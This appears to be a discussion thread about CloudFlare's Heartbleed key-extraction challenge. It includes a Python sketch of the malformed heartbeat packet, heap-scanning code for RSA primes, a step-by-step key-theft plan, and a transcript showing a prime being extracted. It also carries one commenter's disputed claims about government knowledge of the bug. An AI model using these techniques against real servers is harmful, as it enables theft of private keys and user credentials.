That is true - but this exploit doesn't depend on setting a length of 65,536. The server takes whatever length the client gives it (which is, after all, the bug). Most of the early exploits just happened to set the maximum packet size to get as much data out as possible (not realizing the nuances of heap allocation). You can set a length of 8 bytes or 16 bytes and get allocated in a very different part of the heap.
The Metasploit module for this exploit supports varied lengths. Beating this challenge could have been as simple as running it with short lengths repeatedly and re-assembling the different parts of the key as you find them.
edit: something I want to sneak in here since I missed the other threads. Cloudflare keeps talking about how they had the bug 12 days early. Security companies and vendors have worked together to fix bugs in private for years, but this is the first time I've ever seen a company brag about it or put a marketing spin on it. It isn't good, for one simple reason: other security companies will now have to compete with that, which pushes companies not to co-operate on bugs ("we had the bug 16 days early", "no, we had it 18 days early!", etc.).
As users you want vendors and security companies co-operating, not competing at that phase.
 Cloudflare - Can You Get Private SSL Keys Using Heartbleed? http://blog.cloudflare.com/answering-the-critical-question-c...
 see https://github.com/rapid7/metasploit-framework/blob/master/m...
// Essentially OpenSSL's bug is the following:
buffer = malloc(payload_claimed);                     // we aren't going over these bounds
memcpy(buffer, your_actual_payload, payload_claimed); // we ARE going over your_actual_payload's bounds
By changing your actual payload's size you can influence what data we get. The claimed payload length doesn't really matter much - it's just the amount we copy starting from wherever our actual payload ends up - so it should always be 65536 for best results.
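For the curious, here's roughly what the malformed record looks like on the wire - a minimal sketch in Python, assuming the TLS handshake has already been completed on an open socket s (field layout per RFC 6520; this is illustrative, not a working exploit):

    import struct

    # TLS record header: content type 24 (heartbeat), version TLS 1.1, length 3
    record = struct.pack('>BHH', 0x18, 0x0302, 3)
    # heartbeat message: type 1 (request), claimed payload length 0xFFFF,
    # followed by... no payload at all. The server memcpy()s 0xFFFF bytes anyway.
    record += struct.pack('>BH', 0x01, 0xFFFF)
    s.sendall(record)

Any real payload bytes you do send change the size (and thus the heap placement) of the request's allocation, which is the knob the parent comment is talking about.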
Incidentally, I got the following off the server (a payload size of 0x1D seems to hit it) but it doesn't seem to accept it as the real RSA key.
I wonder if someone's spamming requests containing false keys at the server, or if they've just stopped accepting answers.
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
Just for further reference, I recommend reading about OpenSSL's freelist implementation. Essentially, if you have an object that uses a specific amount of space, it will be stored in a specific location. That is why private key extraction is possible: you just need to craft a request that puts your_actual_payload in a location such that the 65536 bytes read from it into a buffer also end up covering the key.
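A toy model of the behaviour that matters here (this is not OpenSSL's actual code, just the idea): freed buffers sit in per-size buckets and come back, contents intact, to the next allocation of the same size.

    freelist = {}   # size -> stack of previously freed buffers

    def fl_free(buf):
        # the buffer is recycled; its old contents are NOT wiped
        freelist.setdefault(len(buf), []).append(buf)

    def fl_malloc(size):
        bucket = freelist.get(size)
        # a same-size request gets the stale buffer back, old bytes and all
        return bucket.pop() if bucket else bytearray(size)

So the length you request decides which bucket - and therefore whose leftovers - your heartbeat lands next to.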
But brute force everything you get back? Easy.
Take every key-sized chunk of heap you got back, and see if, when interpreted as the key, it is the private key to the public cert. When found, send it in!
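In practice you don't even need the full key structure: finding either RSA prime is enough, since the public modulus n is right there in the certificate. A rough sketch of that scan in Python (treating the byte order of the leaked bignum as unknown, which is an assumption):

    def find_factor(leak, n, size=128):
        """Scan leaked bytes for a 1024-bit prime factor of a 2048-bit n."""
        for i in range(len(leak) - size + 1):
            chunk = leak[i:i + size]
            for candidate in (chunk, chunk[::-1]):   # try both byte orders
                p = int.from_bytes(candidate, 'big')
                if p > 1 and p % 2 == 1 and n % p == 0:
                    return p
        return None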
edit: OpenSSL wraps malloc, so behaviour differs between systems. You could find out what the probabilities are by looking at the source. For some reason FreeBSD's malloc gave up private keys with the default exploit length and not much effort. It was only a matter of time before other platforms were figured out as well.
Note that the FreeBSD exploit worked on a fresh server after boot, which might have also been the case here.
Note that the heap also holds the intermediate values that are used when constructing the connection and doing the encryption. You aren't exactly looking for '-----BEGIN PRIVATE KEY-----' or a base64 string; you'd be looking for those intermediates, each of which has its own data type.
That's what I thought as well when I saw people POSTing strings like that and other people finding them. But when the key is first loaded from the file, wouldn't all those base64 strings actually be in memory?
Probably just pretty unlikely that they would persist for a long time without being overwritten.
You can't, however, get away with not having the private key modulus in memory (in some form) all the time.
"We fixed the flaw on Monday March 31, 2014 for all CloudFlare customers, with public notification on Monday April 7, 2014, after the researchers' public announcement." -- https://support.cloudflare.com/hc/en-us/articles/201660084-U...
And we didn't know what to do about it...
The CIA and FBI had knowledge of variations of this vulnerability nearly 10 years ago.
OpenSSL has been patching variations of this bug for that whole time, and every good hacker (and the bad ones) has been exploiting OpenSSL since its creation.
People act surprised, but OpenSSL has never had a secure release. Ever.
This isn't true. Don't make things up - this bug is bad enough without misinformation.
> OpenSSL has been patching variations of this bug for that whole time
Untrue. OpenSSL has been patching unrelated bugs since it was created (as has most software).
This is unrelated to heartbleed.
The known-vulnerabilities list for OpenSSL has never had a release that didn't include a flaw allowing some amount of backdooring, data extraction, or data manipulation (as opposed to just a path for a DoS attack).
>Don't make things up -
I don't have to make things up. The CIA and FBI keep a list of known vulnerabilities, publicly and not publicly documented. They use this information for doing investigations. I have personally run into issues where I was contacted by the FBI because we had created fixes for our deployments, and they contacted us to "unfix" them, because their warrants were "no knock" and they didn't wish to tell us who they were attempting to do surveillance on.
Feel free to Google me (Brandon Wirtz) if you need some background on my credentials in the security space.
But thanks for jumping straight to "he makes stuff up". The misinformation that is out there is that OpenSSL has ever been secure.
I'm more sad that nobody beyond XKCD did a good job explaining how the bug works, or did the demonstration I like, where you bash on the server and do data alignment to show a couple of gigs' worth of data from a single server. People aren't scared enough of this stuff.
All those people saying "change your passwords on every site", but nobody is creating a huge public list of which sites are currently not patched.
so >bad enough without misinformation
No. People are too complacent, and the open-source community doesn't own up to the things it lets slip by. The "smart" guys at CDNs and banks were never at risk, because they use proxies with an extremely short "memory life" - data is streaming through rather than stored, so by the time you could get a second value to do fingerprinting, everything would have changed - and they are running NSS, or Matrix, or Polar.
Heartbleed is an issue because too many people are too complacent, too trusting, and too uninformed.
So, in conclusion, there are a number of hard but necessary steps to reduce the threat surface so this sort of thing never happens again. Because doing the same thing and expecting a different result is the proverbial definition of "stupid."
FOSS is part of the economy and important projects should be treated with the seriousness, responsibility and customer service of a business, even if the sale price is $0.
I think that the revenue model for Polar has put more money into making sure it is secure. OpenSSL has always suffered from the fact that it is mostly "leechware": people use it but don't contribute, because it isn't related to their core competency, so they don't mod or upgrade it. Polar, on the other hand, has people paid to test, patch and maintain the code.
I don't suggest doing the cleartext between server and proxy, but the idea is the same. You use a proxy so that you don't ever have usernames or passwords in memory for longer than a few ms.
Once a user is authenticated data passes through quickly making it very very difficult to do a fingerprint match of the data you do extract.
Also, because you can load-balance across proxies, you may not even hit the same machine with a second heartbeat.
The Cert still has to be there somewhere, so you could still end up giving up a cert, and you could give away anything that fits on a single HTML page as it is flying by in the stream... But most sites know better than to display a password, or a username and a bank account number at the same time (not all, but most).
Heartbleed is more of an issue because too many people built monoliths rather than compartmentalizing. The Titanic didn't sink because it was compartmentalized; it sank because the man at the wheel didn't know to let one compartment take all of the force, and instead spread it over a larger surface.
Your proxy should be disposable. Nothing of value should be on the thing that talks to the user, and it shouldn't retain data for any length of time.
Heartbleed is dangerous because it exposes private keys, and that lets you decrypt SSL traffic. That in turn may let you read passwords.
Don't conflate the two separate things.
Compartmentalizing is good, but doesn't protect against Heartbleed.
Disposable proxies don't protect you.
Perfect Forward Secrecy does protect you because the private keys aren't reused. It is notable that you didn't mention the one technique that actually helps.
To me that shows you misunderstand what Heartbleed is. Some of your criticisms of OpenSSL are valid, but not for the reasons you claim.
The private key exposure lets you do impersonation, but you would have to do something with DNS or suchlike to get it to work. Whereas me getting your user/pass or account information has immediate impact, and can't be "undone".
Conflate doesn't mean what you think it does. Conflation has to be a wrapper for several topics or ideas that are related.
I can't "conflate" two unrelated things, because conflation is by default "true". If we were discussing gentrification and inflation in the San Francisco housing market, then we would be talking about the conflated issue of "the San Francisco housing crisis".
Just as you can't "inflate" something with a vacuum, or sand, or peanut butter, you can't conflate something with something that is unrelated.
This misunderstanding of the word conflate comes from the fact that "confused" sounds so much like it; when people are trying to sound smart they use the word conflate when they really mean confuse, and think the two are synonyms.
PlexiNLP (I know my words)
You won't find it on them. Their branch doesn't have the issue.
Also look through this http://web.nvd.nist.gov/view/vuln/search-results?query=opens...
You will see mentions of this bug in products that use OpenSSL quite often.
After the Snowden business, I wouldn't be hugely surprised if the gov't was secretly aware of Heartbleed, but I'm not comfortable taking a random stranger's word for it.
If there is a common denominator between all the OpenSSL bugs of the last 10 years, it is that they often come from basic problems/difficulties with C (array out-of-bounds, length checks and such).
OpenSSL has been vulnerable, as you state, because it is C rather than managed code, and managing memory has never been one of the core team's strong suits.
I get the reason for using C: OpenSSL is probably the most performant SSL solution available. It is much less resource-intensive than, say, Polar. (NSS is getting there, but is not really a solution for embedded systems [routers and such].)
>all OpenSSL bugs in the last 10 years is that they often come from basic problems/difficulties with C (array out of bounds, length checks and such)
When you have a means to overflow or retrieve memory, you can get at data, or execute code that gives you data. That is the bug causing Heartbleed.
What is making Heartbleed worse is that it goes back so many versions, so for the first time in a long time there is a well-known vulnerability that is the same for everyone who runs it.
It isn't a "worse" vulnerability, it is a "more common" one. Think of it like a genetic defect: if 1 animal in 10 has it, the herd still has "herd immunity". Or the old "there are no viruses for Mac", back when the Mac had about 2% market share, so even when there were viruses they were hard to spread. We are now at a point where everybody who wants to be malicious knows how to attack, and there are a lot of things to attack, so more attackers will get "lucky" and find something interesting - especially since there will be so many servers that no one remembers they need to track down and fix.
How do you not love this guy?
I love the internet.
Just awesome. Only 3 hours to rip out the key!
Me? Insane jealousy.
(Although I do like that he made me google up the X-Men And Teen Titans cover art to confirm the source of his Twitter pic.)
If I replace his IP with some other random IP I get a 400 Bad Request error, so it's obvious that it works, but I'm curious how that resolves.
Then, your browser checks the received certificate against the authenticated TLS connection, and sees that all is well, allowing you to connect without a warning.
Since the browser does not warn of a certificate mismatch, he must have a valid certificate for 'cloudflarechallenge.com'. QED.
Either go to https://www.cloudflarechallenge.com or remove the www subdomain from your hosts entry.
I see Indutny's blog for 'https://www.cloudflarechallenge.com'[/etc/hosts mapped to 220.127.116.11] in both FF and Chrome.
openssl s_client -connect 18.104.22.168:443 -showcerts \
He's presenting the CloudFlare-obtained cert (which the site offers up on request), so the lack of a warning means he's got that private key.
Getting another CA-signed certificate, naming 'www.cloudflarechallenge.com' and matching another private key, would itself be an impressive compromise, though not the challenge CloudFlare made or what he's demonstrating.
So far, two people have independently solved the Heartbleed Challenge.
The first was submitted at 4:22:01 PST by Fedor Indutny (@indutny). He sent at least 2.5 million requests over the span of the challenge, which was approximately 30% of all the requests we saw. The second was submitted at 5:12:19 PST by Ilkka Mattila, using around 100 thousand requests.
We confirmed that both of these individuals have the private key and that it was obtained through Heartbleed exploits. We rebooted the server at 3:08 PST, which may have contributed to the key being available in memory, but we can't be certain.
I had the bleed script running in a while loop with no sleep, and ab running in a loop as well, sending connections to the server hoping to get the memory jostled around enough to cause something like what you described.
I was unsuccessful as of 9:30AM... now I'm really curious to get home and see if I actually caught it... even though I already missed the $10k boat :(
If you only change your current cert to get a new key, but don't go through the revocation process for the old certificate, then anyone who managed to get the old one can still use it for a MITM attack, as both certs would be valid to any client.
Specifically, I'd be most interested for such a walkthrough for Google Chrome on OS X, which most people I know use.
Pic of the CloudFlare team reviewing the attack. Ten guys crowded around one monitor.
edit: now why in the world is my comment being downvoted?
Backup Suspect: Teetotaler/Brogrammer-hater. Doesn't like beer on the desk at work.
but imagine this being "the team" in charge of mission critical stuff on a 777.
experience cannot be gained through shortcuts or pure intelligence.
case in point, this very situation.
That looks a lot like the scene from SV where the Snooli guys figure out that the "algorithm" is really good.
Also that's one BIG monitor.
I took the approach of using two fingerprints to search the data:
1) The hex sequence "30 82 .. .. 02 01 00" which would indicate the ASN.1 private key encoding which OpenSSL uses.
2) The modulus which I extracted from the public key (which would also be in the private key structure)
I didn't find any instance of the first, the second I found lots of instances of (because the modulus is also in the public key). I then filtered out all the instances of the public key by searching for the public key header ("30 82 .. .. 30 82").
This actually left me with two unique instances of the modulus in memory which weren't in a public key structure. I then tried to overlay the private key structure over the data and extracted what should have been the prime numbers and ran a primality test on them (to verify; another way would have been to just feed the structure into openssl). Both failed, so it wasn't the private key structure.
But there's a reasonable chance that those two instances represented a cryptographic calculation in progress; so while recovering the key wouldn't be as trivial as if you grabbed the full private key structure from memory (which I suspect is what the successful attackers did) I think it definitely represents another attack angle.
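A rough sketch of those two fingerprints as actual searches, in Python (the two ".." bytes are the variable ASN.1 length field, as in the hex patterns above):

    import re

    # 1) RSAPrivateKey header: SEQUENCE, 2 length bytes, INTEGER version 0
    PRIV_HDR = re.compile(rb'\x30\x82..\x02\x01\x00', re.DOTALL)
    # public-key header used for filtering: SEQUENCE containing a SEQUENCE
    PUB_HDR = re.compile(rb'\x30\x82..\x30\x82', re.DOTALL)

    def fingerprints(dump, modulus):
        """Return offsets of private-key headers and of bare modulus hits."""
        priv_hits = [m.start() for m in PRIV_HDR.finditer(dump)]
        mod_hits = [i for i in range(len(dump)) if dump.startswith(modulus, i)]
        return priv_hits, mod_hits

Modulus hits sitting just after a PUB_HDR match are the public-key copies, and can be discarded as described above.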
That doesn't make sense to me, seems like the key needs to be in memory all the time, or at least during every session.
1) Create a VM with the same version of Linux, nginx, openssl.
2) Create a self-signed SSL certificate for the server
3) Verify that the HTTPS server is vulnerable to heartbleed
4) Run a few HTTPS requests against the server
5) Use gcore (or just send SIGABRT) to get a core file of the nginx process
6) Write a tool to check the memory image for remnants of the private key (since I know what it looks like). This may be encoded in several forms: as is from the ssl key file, hex encoded modulus, binary encoded modulus, however the BigNum stuff in OpenSSL stores the modulus, intermediate values used in calculations, etc. I can also check for partial matches since I know what the full key looks like.
7) Run the heartbleed client against the site to extract some chunks of memory, there are various strategies for this:-
a) Repeatedly grab the largest possible chunk (65535 bytes) of memory each time
b) Repeatedly grab different sizes (8KB, 16KB, etc) depending on the bucket sizes for OpenSSL's freelist wrapper around malloc.
c) Vary the request size (lots more headers, etc) to try and get different chunks of memory returned.
d) Occasionally restart nginx
8) Once I can reliably (for whatever value of reliably that is) get the key from my own server, I then change the test for success from a comparison against the known private key to a test which involves decrypting a string that was the result of encrypting some known plaintext with the known public key (see the sketch after this list). That'll be slower, but still possible.
9) Run that analysis against real data retrieved from the challenge server. The data (using the various strategies in #7) can be obtained in the background whilst I'm developing #1-#8. You can't rely on having sole access to the server, so whatever strategy you use may be perturbed by other people performing requests.
10) Repeat #1-#8 for Apache and any other web server that is vulnerable to heartbleed.
This does work on the assumption that the key (in whatever form it is in) will be returned as a contiguous block of memory. Trying to patch together chunks of memory to look for the key will be much much harder unless there's significant overlap and it's easy to detect what/where a key is somehow.
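Step 8 might look something like this sketch (using the 'cryptography' package; the function names here are that library's, but the overall harness is an assumption, not a tested tool):

    from cryptography.hazmat.primitives import serialization
    from cryptography.hazmat.primitives.asymmetric import padding

    def is_real_key(candidate_der, ciphertext, plaintext):
        """candidate_der: a key-sized chunk overlaid with the RSAPrivateKey
        structure; ciphertext was made earlier with the known public key."""
        try:
            key = serialization.load_der_private_key(candidate_der, password=None)
            return key.decrypt(ciphertext, padding.PKCS1v15()) == plaintext
        except Exception:
            return False   # malformed chunk, or the wrong key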
As I said, I am not sure that is right, or that it was the method used to exploit CloudFlare - I didn't have the time or the knowledge of the OpenSSL implementation to test it out. I am just throwing my guess out there before the official exploit comes about.
EDIT He won't reveal it for a week. Good on him. https://twitter.com/indutny/status/454790640078176256
Anything you'd send to a web server or receive from a web server is presumed compromised.
TL;DR: patch OpenSSL, and revoke and rekey all your certs.
Remember, lots of people are pushing up bogus stuff into the heap, so just because you see something there doesn't mean Cloudflare leaked it.
Having to be root to be able to bind to a TCP port <1024 is no longer necessary on a modern OS.
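On Linux, for instance, you can grant just that one capability to the binary instead of running it as root (the path here is an example):

    sudo setcap 'cap_net_bind_service=+ep' /usr/sbin/nginx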
It was fun playing pen tester and getting paid for it this week :)
One of the things that caught me off guard, but isn't surprising, is that some hosting companies don't use VM isolation, so it was possible to pull memory from other sites which may have been patched. Hopefully hosting vendors that don't have isolated VMs don't also allow users to install their own OpenSSL, as this would become a vector for compromising neighboring hosts. Of course, allowing any custom software install in such an environment is just asking for it.
Could you explain this please?
Here's a possible scenario... I root virtual machine X running on host Z (using heartbleed). Another machine running on Z is virtual machine Y. Because X and Y are not isolated, and I am running whatever I want on X, I can find some uncleared memory (somehow -- how?) that was previously used by Y, thus giving me access to Y. (Seems a bit handwavy, and I'm not sure this is what you meant, so any details would be helpful.)
For some context, I looked up "VM isolation" and found this article which I think sums it up pretty nicely: http://blogs.msdn.com/b/rsa2008/archive/2008/04/07/isolation...
Normally this is protected by tls, but as you can see, for servers that suffer from this hole, it's as good as naught.
Note that this occurs for "any" connections hitting the vulnerable server, meaning that a patient attacker can just run this in a script and scoop up passwords, credit card numbers, and form information POSTed in by all users of the web service, all day long, until the hole is closed. And even then, there's a good chance that the private keys were already exposed, in which case the attacker can now masquerade as the server.
I basically take the stance that I want as little to do with your real password as possible.
So I booted up a micro VM on Amazon AWS and was able to dump the private key in one request.
Ubuntu Server 13.10 (PV) - ami-35dbde5c
sudo add-apt-repository ppa:nginx/development
sudo apt-get update
sudo apt-get install nginx
sudo apt-get install ssl-cert
sudo /etc/init.d/nginx restart
curl -O https://gist.githubusercontent.com/benmmurphy/12999c91a4d328b749e3/raw/9bcd402e3d9beec740a61a1585e24c36dea80859/heartbeat.py
chmod u+x heartbeat.py
ubuntu@ip-10-185-20-243:~$ ./heartbeat.py localhost /etc/ssl/certs/ssl-cert-snakeoil.pem
Using modulus: C30FB990C6C1EE4EE4524A724BDF10DCDC735C9BCCED84B38796584DCE9F7CB1027CCF63A0E604882AE9B8639CD0955C207BE641943AE38AC4DAE63ECCE7E79ACE7EB9EB5D92F55761924C35A00EB5AE4759CB6DC938DBD48ED34685BC32B3193FEF55F081BB2BFC33494F26E556803FD2506F94301DFD688A63F9F3572C540F3F5E7679D5454E532503636ABFCB95AC5674D47C2B23C4418E04BE1D36AECF6BFEA81FC38FCA3E72A3EACD0BFD4E07FDC3BFA8E70E002ECA68FE8E0621F56081D90A3724A1BED6B5E3BDCDCC02B4EDEAFD0EC4D60C7DEC95BF7756CD82442915EE1AB6738F38B3BA932C8D27B34E94205C84AB64ACC34487ED2FF3804332AB63
Using key size: 128
Scanning localhost on port 443
Sending Client Hello...
Waiting for Server Hello...
Got length: 66
... received message: type = 22, ver = 0302, length = 66
Message Type is 0x02
Got length: 750
... received message: type = 22, ver = 0302, length = 750
Message Type is 0x0B
Got length: 331
... received message: type = 22, ver = 0302, length = 331
Message Type is 0x0C
Got length: 4
... received message: type = 22, ver = 0302, length = 4
Message Type is 0x0E
Server sent server hello done
Server TLS version was 1.2
Sending heartbeat request...
Got length: 16384
... received message: type = 24, ver = 0302, length = 65551
Received heartbeat response:
Got result: 154948185083822336433702373602285084550034029190596792283600073258494868382158852796844241764405565518400264295279959791461705192749666707538790201985451035410116800023040704455951541838840288378897688943017357577574672157589664822948047455855119173651635078033464041188274590174256703712210173285385390714209
found prime: 0xdca74e63a186d60a9de3c8211e21a5b165c6d86d285c1d6eece2ad7a2505890ebae513e3013c3602f148e2112eaa99edd8ff5922494c4db47156727f93ab0f35a298553a82dfbd91e5e8aff2e969f31db31263bce9a89d95b64ff38ff5b86d47fa2e70aac5198d2ea967eb952f48b7264e824bd03b1c955294fb9caeed02ed61L
ubuntu@ip-10-185-20-243:~$ sudo openssl rsa -in /etc/ssl/private/ssl-cert-snakeoil.key -text
Edit: My code's tested too - the primes it gives me are exactly the same as the values in the private key
Edit 2: Doesn't even have to be the first request after restarting, I fired off a few hundred simple test requests first and it still worked. It's likely that any lightly-loaded nginx install on Debian was wide open.
Other possible contributing factors: I was hammering the server with empty https requests hoping it would leave traces of calculation about, and was running a few dozen of the heartbeat keysearch in parallel. I don't know if either of these helped or not.
Who knows, maybe some anonymous benefactor carefully extracted the primes out of a more opaque data structure and uploaded them neatly back to the heap for us all to find!
I also thought an earlier discoverer might have been trolling us :)
d (the private key) is:
d = e^-1 mod ((p-1)(q-1))
This is why you need to know the factorisation of n=(p*q). You can't compute d (the private key) with just the composite n.
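Concretely, once a prime has been fished out of the heap (as in the transcript above), recovering d is a few lines of Python (pow(e, -1, m) needs Python 3.8+; e = 65537 is the usual public exponent, an assumption here):

    q = n // p                      # n comes from the server's certificate
    assert p * q == n               # sanity check: p really divides n
    d = pow(65537, -1, (p - 1) * (q - 1))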
static int RSA_eay_private_decrypt(int flen, const unsigned char *from,
             unsigned char *to, RSA *rsa, int padding)
{
    ...
    /* cleanup: temporaries and the decrypt buffer are cleansed on the way out */
    if (ctx != NULL) { BN_CTX_end(ctx); BN_CTX_free(ctx); }
    if (buf != NULL) { OPENSSL_cleanse(buf, num); OPENSSL_free(buf); }
    return(r);
}

void BN_CTX_free(BN_CTX *ctx)
{
    if (ctx == NULL) return;
#ifdef BN_CTX_DEBUG
    BN_POOL_ITEM *pool = ctx->pool.head;
    fprintf(stderr,"BN_CTX_free, stack-size=%d, pool-bignums=%d\n",
        ctx->stack.size, ctx->pool.size);
    while(pool) {
        unsigned loop = 0;
        while(loop < BN_CTX_POOL_SIZE)
            fprintf(stderr,"%02x ", pool->vals[loop++].dmax);
        pool = pool->next;
    }
#endif
    BN_STACK_finish(&ctx->stack);
    BN_POOL_finish(&ctx->pool);
    OPENSSL_free(ctx);
}

static void BN_POOL_finish(BN_POOL *p)
{
    while(p->head) {
        unsigned int loop = 0;
        BIGNUM *bn = p->head->vals;
        while(loop++ < BN_CTX_POOL_SIZE) { if (bn->d) BN_clear_free(bn); bn++; }
        p->current = p->head->next;
        OPENSSL_free(p->head);
        p->head = p->current;
    }
}

void BN_clear_free(BIGNUM *a)
{
    if (a == NULL) return;
    if (a->d != NULL)
        OPENSSL_cleanse(a->d, a->dmax * sizeof(a->d[0]));  /* then freed */
    ...
}

/* the cleanse itself overwrites the freed memory with a rolling pattern */
static unsigned char cleanse_ctr = 0;
void OPENSSL_cleanse(void *ptr, size_t len)
{
    unsigned char *p = ptr;
    size_t loop = len, ctr = cleanse_ctr;
    while (loop--) {
        *(p++) = (unsigned char)ctr;
        ctr += (17 + ((size_t)p & 0xF));
    }
    p = memchr(ptr, (unsigned char)ctr, len);
    if (p) ctr += (63 + (size_t)p);
    cleanse_ctr = (unsigned char)ctr;
}
Luckily, the fix is easy: upgrade, revoke, and force password changes for everyone.
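For what it's worth, a quick way to triage a host: a server that doesn't advertise the heartbeat extension can't be bled at all, while one that does may or may not be patched, so the local version/build-date check is the reliable test.

    # does the server advertise the heartbeat TLS extension?
    echo | openssl s_client -connect example.com:443 -tlsextdebug 2>&1 | grep -i heartbeat
    # locally: 1.0.1 through 1.0.1f are the vulnerable range
    openssl version
    # distros backport fixes: a build date of Apr 7 2014 or later suggests a patched build
    openssl version -b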